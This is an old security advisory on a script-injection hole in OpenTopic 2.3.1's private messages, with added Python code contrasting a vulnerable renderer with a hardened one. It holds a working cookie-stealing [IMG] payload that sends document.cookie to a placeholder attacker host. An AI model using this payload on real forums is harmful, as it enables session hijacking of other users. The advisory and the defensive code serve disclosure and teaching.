5th Jan 2003 [SBWID-5904]
COMMAND
OpenTopic XSS (script injection) -> Cookies recovery
SYSTEMS AFFECTED
OpenTopic Version : 2.3.1
PROBLEM
Frog Man [leseulfrog@hotmail.com] found :
Location/Exploit :
°°°°°°°°°°°°°°°°°°
The XSS hole is in the private messages area ( http://[target]/OpenTopic?a=ugtpc ).
XSS to get cookie :
[IMG]http://[website]/img.gif"width="750"height="750"onmouseover="a=document['coo'+'kie'];location='http://[attacker]/?'+a;[/IMG]
More details about XSS :
°°°°°°°°°°°°°°°°°°°°°°°°
In French :
http://www.phpsecure.org/article/XSS.php
SOLUTION
see [http://www.infopop.com]
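The payload shape above depends on the [IMG] URL reaching the src attribute unescaped, so that the embedded double quote closes the attribute and the rest is parsed as new attributes. An added example (not Infopop's code or fix; the function names, the img.example host and the harmless handler body are assumptions for illustration) showing that rendering pattern beside a hardened renderer:

```python
import html
import re
from urllib.parse import urlsplit

IMG_TAG = re.compile(r"\[IMG\](.*?)\[/IMG\]", re.IGNORECASE | re.DOTALL)

# Constructed sample: same quote-breakout shape as the advisory's payload,
# with a placeholder host and a harmless handler body.
SAMPLE = '[IMG]http://img.example/img.gif"width="750"height="750"onmouseover="x=1;[/IMG]'


def render_img_naive(message):
    """Vulnerable pattern: the URL is pasted into src="..." unescaped."""
    return IMG_TAG.sub(lambda m: '<img src="%s">' % m.group(1), message)


def is_safe_image_url(url):
    """Accept only absolute http(s) URLs free of attribute-breaking characters."""
    if re.search(r'[\s"\'<>`]', url) or any(ord(c) < 0x20 for c in url):
        return False
    try:
        parts = urlsplit(url)
    except ValueError:  # malformed netloc, e.g. unbalanced brackets
        return False
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def render_img_hardened(message):
    """Escape all user text; emit <img> only for URLs that pass validation."""
    out, pos = [], 0
    for m in IMG_TAG.finditer(message):
        out.append(html.escape(message[pos:m.start()], quote=True))
        url = m.group(1).strip()
        if is_safe_image_url(url):
            out.append('<img src="%s" alt="">' % html.escape(url, quote=True))
        else:
            # Rejected tags are shown as inert text, never as markup.
            out.append(html.escape(m.group(0), quote=True))
        pos = m.end()
    out.append(html.escape(message[pos:], quote=True))
    return "".join(out)


if __name__ == "__main__":
    print(render_img_naive(SAMPLE))
    print(render_img_hardened(SAMPLE))
```

Session cookies marked HttpOnly are additionally unreadable through document.cookie, which limits what a script injection of this kind can recover.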